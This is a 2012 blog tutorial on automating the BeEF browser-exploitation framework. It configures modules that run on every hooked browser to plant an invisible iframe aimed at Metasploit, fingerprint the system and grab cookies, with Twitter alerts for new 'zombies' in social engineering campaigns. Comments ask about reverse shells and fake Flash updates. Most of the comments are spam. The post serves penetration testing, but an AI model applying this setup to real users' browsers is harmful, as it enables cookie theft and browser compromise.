Monday, August 13, 2012

Happy Hooking! - BeEF autorun and Twitter notify

Today's post is contributed by Ryan Linn.

In previous posts, we’ve looked at both how to use BeEF in a real world pen test, as well as how to use the REST API to automate common tasks in BeEF. In this post, we’re going to take a look at how to use the REST API to auto-run multiple modules at one time, and set up Twitter notification.

Why would we want to do this? In the Real World series, we looked at number of modules that can be helpful when profiling browsers. But, what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? By default, BeEF allows for a single module to be auto-run. But, we can auto-run a number of different modules, and even customize them for specific browsers using the REST API.

Now we can easily manage more zombies coming in at a time from a social engineering campaign. Also, we have ensured that we have maximized the information we can get from the browser regardless how long a browser is hooked!

To get the scripts, start by going to and downloading the framework tools. There will be two tools that we’ll be looking at in this blog post. The first is the autorun.rb script that will handle the autorun functionality. The second is the dump_mod_info.rb script, that will output all of the modules we may use.

To get the list of modules, let’s begin by starting our BeEF Instance:

$ ./beef
[17:57:07][*] Browser Exploitation Framework (BeEF)
[17:57:07] | Version
[17:57:07] | Website
[17:57:07] | Run 'beef -h' for basic help.
[17:57:07] |_ Run 'git pull' to update to the latest revision.
[17:57:08][*] BeEF is loading. Wait a few seconds...
[17:57:08][*] 8 extensions loaded:
[17:57:08] | Events
[17:57:08] | Requester
[17:57:08] | Proxy
[17:57:08] | Console
[17:57:08] | XSSRays
[17:57:08] | Demos
[17:57:08] | Autoloader
[17:57:08] |_ Admin UI
[17:57:08][*] 114 modules enabled.
[17:57:08][*] 2 network interfaces were detected.
[17:57:08][+] running on network interface:
[17:57:08] | Hook URL:
[17:57:08] |_ UI URL:
[17:57:08][+] running on network interface:

[17:57:08] | Hook URL:
[17:57:08] |_ UI URL:
[17:57:08][*] RESTful API key: fba4fc47a6d56c4b23b29027a4ea4524c410643f
[17:57:08][*] HTTP Proxy:
[17:57:08][*] BeEF server started (press control+c to stop)

Next, lets dump the list of modules and pipe it into less:

$ ./dump_mod_info.rb | less

The first thing we want to do is to launch a hidden IFRAME to point to our Metasploit instance. To do this, lets find the module to create a hidden IFRAME.

When we find it in the less output, it looks like this:

MOD: invisible_iframe
Creates an invisible iframe.
  [{"name"=>"target", "ui_label"=>"URL", "value"=>""}]

We have one option to set: the “target.” The value is the URL we want to launch in the hidden IFRAME. To make this module auto-launch in the autorun.rb script, we open the autorun.rb script and find the autorun_mods hash.

The autorun_mods hash is a key value pair. The key is the name of the module to run, and the value is a hash of options. In this case, if we wanted to just run this one module pointing to http://localhost:8080 then we’d create our autorun_mods to be:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => '' }}

We want to do more than that though, so let’s add some more fingerprinting in:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://' }},
  { 'Browser_fingerprinting' => {}},
  { 'Get_cookie' => {}},
  { 'Get_system_info' => {}}

This will launch browser fingerprinting, our invisible iframe, try to get the cookies for the visiting page, and launch a java applet that will try to fingerprint the browser’s system info. Now that this is all setup, we save our autorun.rb script and just run it:

$ ./autorun.rb

Now the script is running, we launch a browser to get hooked and watch our BeEF

[18:11:45][*] New Hooked Browser [ip:, type:FF-13, os:Linux], hooked domain []
[18:11:50][*] Hooked browser has been sent instructions from command module 'Create Invisible Iframe'
[18:11:50][*] Hooked browser has been sent instructions from command module 'Fingerprint Browser'
[18:11:50][*] Hooked browser has been sent instructions from command module 'Get Cookie'
[18:11:50][*] File [/home/sussurro/beef/modules/host/get_system_info/ getSystemInfo.class] bound to url [/getSystemInfo.class]
[18:11:50][*] Hooked browser has been sent instructions from command module 'Get System Info'
[18:11:55][*] Hooked browser has executed instructions from command module 'Get Cookie'
[18:11:55][*] Hooked browser has executed instructions from command module 'Create Invisible Iframe'
[18:11:57][*] Hooked browser has executed instructions from command module 'Fingerprint Browser'

We can see from the output that our auto-run script has executed the modules 5 seconds after our initial hook has taken place. This is far faster than if we had done this manually. From here, we can go into the user interface to view the results. Or, the autorun script spits out session, module, and command id’s to get the statuses of the run modules programmatically.

While these scripts are a good starting point, you may want to do more customization. This can be done by  modifying the Ruby and following the steps in the REST post and documentation.

The final piece we want to add is Twitter notification. Let's have a little birdie tell us when we've hooked our Zombies. This will make sure, if we have a social engineering campaign running, we can both auto-collect data and be notified when we start getting successes.

First we need to create a Twitter application at Once logged in we want to create our application. Here’s the sample settings for my application, notice the permissions that are required to send DM’s.

BeEF Notifier Properties
BeEF Notifier Properties

Next, we need to create our personal access tokens for our account. To do this, there should be a link at the bottom of the page to authorize our account. Once we do, we should see another set of information about our access tokens like below:

Access Token
Access Token

Now we have all of the information to update BeEF to configure twitter notifications. We edit extensions/notifications/config.yaml and set enable to true under notifications and under twitter. Finally we configure our keys from the previous steps and our target usernames, save the file, and we should be all set.

Restart BeEF, login, and hit the link for the basic demo page, and you should get two DM’s like below:

DMs from Twitter
Direct Messages on Twitter
Now you’re all set for your campaign to begin. Sit back, wait on Twitter to tell you when you’ve got zombies, and automate as much as you can to maximize your success rate. Happy Hooking!


  1. If you can run a java applet for fingerprinting, can't you run a reverse shell and persistence too?

    1. Great Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

    2. Find the Best Rated Tablet for Kids · Fire HD 8 Kids Edition Tablet · Fire 7 Kids Edition Tablet · Fire HD 10 Kids Edition Tablet · Tagital T10K Kids Tablet ·ow We Chose Our Favorites. We analyzed all of the kids' tablets on the market, with an eye on durability, app availability, child safety best tablet for kids

    3. Best true wireless earbuds under $100. Stay cheap while staying wireless. Updated December 2020. The Best All-Around. The best earbuds 2021: our top earphones and in-ear headphones for any budget best cheap earbuds ·

  2. I was attempting to run some modules on beef at startup. i.e in the moudules insert autorun: true
    Im using kali linux. I thought to use the bleeding edge repositories to update to the very latest beef-xss. Unfortunately I still get the same errors:
    For example
    Unable to load module configuration '/usr/share/beef-xss/modules/host/get_internal_ip/config.yaml'

    Hoped someone could point me in the right direction.

  3. how can i execute a module on beef startup
    i want execute fake flash update but alwaiz appears that error unable to load bla bla ... plz somebody help me

  4. how can i execute a module on beef startup
    i want execute fake flash update but alwaiz appears that error unable to load bla bla ... plz somebody help me

  5. Why would we want to do this? In the Real World series, we looked at number of modules that can be helpful when profiling browsers. But, what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? send push notifications

    1. Best Coffee Maker For One Person · Hamilton Beach 2-Way Brewer · Best Drip Coffee Maker · We've researched and tested the best coffee makers, grinders, and espresso equipment to keep you caffeinated best coffee machine.

  6. It's known all over the world that young people don't want to waste their time and they use So I can say that it's mostly not ta problem. they have to read more. And that's all.

  7. Good Post! Thank you so much for sharing this pretty post, it was so good to read and useful to improve my knowledge as updated one, keep blogging.

    Selenium with python Training in Electronic City

  8. • Assignments are designed to make the students burn the midnight oil every day. Students experience depression, anxiety problems and undesirable stress due to so much work and so on. So they tend to move towards taking Assignment Help

  9. Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. smm panels list

  10. This is where you might have started your search for assignment help.The previous consumers give their feedback on the website to let the other users know about the quality of their service. For example, if you go to the allassignmenthelp Reviews, you can get to know the opinion of different users about their services. You can also check other websites to compare and select the best service for reviews

  11. Our assignment help experts could address students' academic topics quite well. Thus, they can opt for our service if they have difficulty in writing the academic task.
    assignment help

  12. ABC Assignment Help provides professional Perdisco assignment help in various subjects for students studying in colleges and Universities across Australia, UK, USA, New Zealand and Canada. We deliver quality solutions for assignments in over 100 subjects. Our tutors focus on providing step-by-step solution to every assignment problem. As a trusted brand among students, we strive to provide 100% unique solutions at an affordable price.

  13. My Assignment Help is an incomparable online Assignment help company delivering excellent academic assignments, essays, coursework and reports. Through a team of over 3000 subject experts we ensure individual attention to every student making the assignment help experience completely personalized in nature.

  14. Our buy custom research paper services are very affordable as we provide you with work that is at a golden equilibrium, try our buy research paper online services today.

  15. I’m really amazed with your posting skills as well as with the layout on your blog site.

  16. Norton Security Deluxe is new applications that have all the qualities of Norton antivirus with some extra services.

  17. One thing that you will realize as you start working with us is that our Write My Essay Services are of good quality and an affordable price. In the field of sports, betting is very unpredictable, but for our case, you have a sure bet concerning the quality of services for all your Cheap Paper Writing Services.

  18. شركة النمل الأبيض للتحكم في الدمام مهمة لأن النمل الأبيض أخطر الحشرات على المنازل ويؤدي إلى تدميرها وتخريبها ويجب عند وجود النمل الأبيض في المنزل الاتصال بأفضل شركة للتحكم بالنمل الأبيض في الدمام للقضاء أخيرًا على هذه الحشرة الخطيرة.
    ارخص شركة مكافحة حشرات


  19. I like this blog its really informative, and i also have some other blogs which you should read.

    Avast Login support number

  20. مواصفات العزل بالرياض
    ترميمات ما قبل العزل
    سعر متر عزل الاسطح
    كيفية عزل الأسطح
    شركة عوازل بالرياض
    شركة عزل خزانات بالرياض
    always exposed to the surfaces of natural factors such as high temperature and rainfall as it adversely affects the insulation of rooftops and hence comes the role of roof insulation company in Riyadh Where we have the latest means of insulation and security as we provide all the services of insulation surfaces and a lot of services that serve many areas ...

  21. شركة عزل بولي يوريثان بالرياض
    شركة عزل فوم بالرياض
    شركة عزل اسطح بالرياض
    افضل شركة عزل خزانات بالرياض
    شركة عزل بالرياض
    2 - Waterproofing, which is the protection of the surface of the water from heavy rain as the water pools cause cracks, which leads to water leakage and the emergence of moisture in buildings and roofs of buildings, which leads to the occurrence of short circuit and water insulation is used in the Gulf countries where water Salty lead to damage to all building materials is used in the insulation of the roofs of buildings and tanks and floor of bathrooms and kitchens and insulation of concrete water tanks, therefore provide you with roof

  22. Very good blog on this topic and its appreciating really.Let know of me -> Garmin Express Thanks for sharing this amazing knowledge with us.

  23. kepuasan dalam bercinta bisa diraih oleh kedua pasangan asal selalu menjaga stamina sebelum beraktifitas seksual, namun akhir-akhir ini banyak wanita yang mengeluh karena banyak pria yang tidak bisa memberi kepuasan lantaran mereka mengalami disfungsi ereksi sehingga alat vital tidak dapat ereksi ketika mau berhubungan intim, dengan hadirnya pil biru asli cod di cikarang bisa memberikan segalanya bagi pasutri yang ingin mencapai klimaks ketika berhubungan badan baca seterusnya . kebutuhan biologis memang sangat penting untuk anda perhatikan karena jika sampai hal ini kita diamkan maka bisa mengakibatkan retaknya hubungan keluarga hingga dapat menimbulkan penceraian. jual permen soloco cod di karawang barat solusi terbaik bagi pria yang tidak bisa mengonsumsi jenis tablet karena rasanya yang pahit. permen soloco memiliki rasa coklat yang kebanyakan disuka oleh pria maupun wanita dengan rasa yang khas. klik disini . kini klg di semarang tengah banyak anda jumpai ditoko obat yang menjual obat-obatan khas untuk pria akan tetapi keaslian produk harus anda ketehaui sebelum anda membelinya ditempat tersebut info lebih lanjut .

  24. There are plenty of smm panel around the world. All Marketing Trends is the number one among them. Thank you for the post. I'll definitely comeback.

  25. joker โบนัส100 เครดิตฟรี เล่นง่าย ได้จริง slot online


  26. شركة تنظيف الامارات

    شركة تنظيف دبي شركة نظافة بدبي
    شركة تنظيف كنب دبي بالبخار تنظيف كنب دبي بالبخار
    شركة غسيل سجاد بدبي غسيل سجاد دبي
    شركة تنظيف في ابوظبي شركات تنظيف ابوظبي
    شركة تنظيف منازل فى العين شركة تنظيف منازل العين
    شركات تنظيف كنب في ابوظبي شركات تنظيف كنب ابوظبي

  27. New Year of Calendar 2020 is coming therefore everyone eager to know and welcoming new year 2020. Everyone now searching for Calendar in their own language like Tamil Calendar 2020 Tamil Calendar, Hindi Calendar, MArathi Calendar etc. Different traditions have different festivals and many more.
    Get More updates of upcoming Easter Festivals : Easter 2020

  28. A community for technical news and discussion of information security and closely related topics.

    click to download

  29. For high profile escort service in Bangalore, we contact you directly on our website. We provide you call girls in Bangalore at cheap and good rates. Welcome to Bangalore Escort Service.Bangalore escort service

  30. Very good written article. It will be supportive to anyone who utilizes it, including me. Keep doing what you are doing – can’r wait to read more posts.

  31. Gurgaon is a famous place for receiving gurgaon call girls. Here call girls are categorized as many categories, you can contact us on our website to get them. Russian Call Girls In Gurgaon

  32. Thanks a lot for sharing it, that’s truly has added a lot to our knowledge about this topic. Keep sharing again such as infromative post.
    HP printer is installed with amazing features, advanced technology, or many technology options. This allows a user to connect to multiple printer systems that are connected to Wi-Fi. While working on an HP printer, you may face some technical problems. Most users encounter problems when connecting HP printers to Mac wireless. If you do not know how to Connect HP Printer to Mac Wireless. Do not be disappointed. You can talk to our HP printer technical experts who provide solutions related to your HP printer issues.

  33. boosting up your credibility instantly, you can also choose to buy Instagram followers from the reliable service provider, click here to know about the best website in this regard. check my blog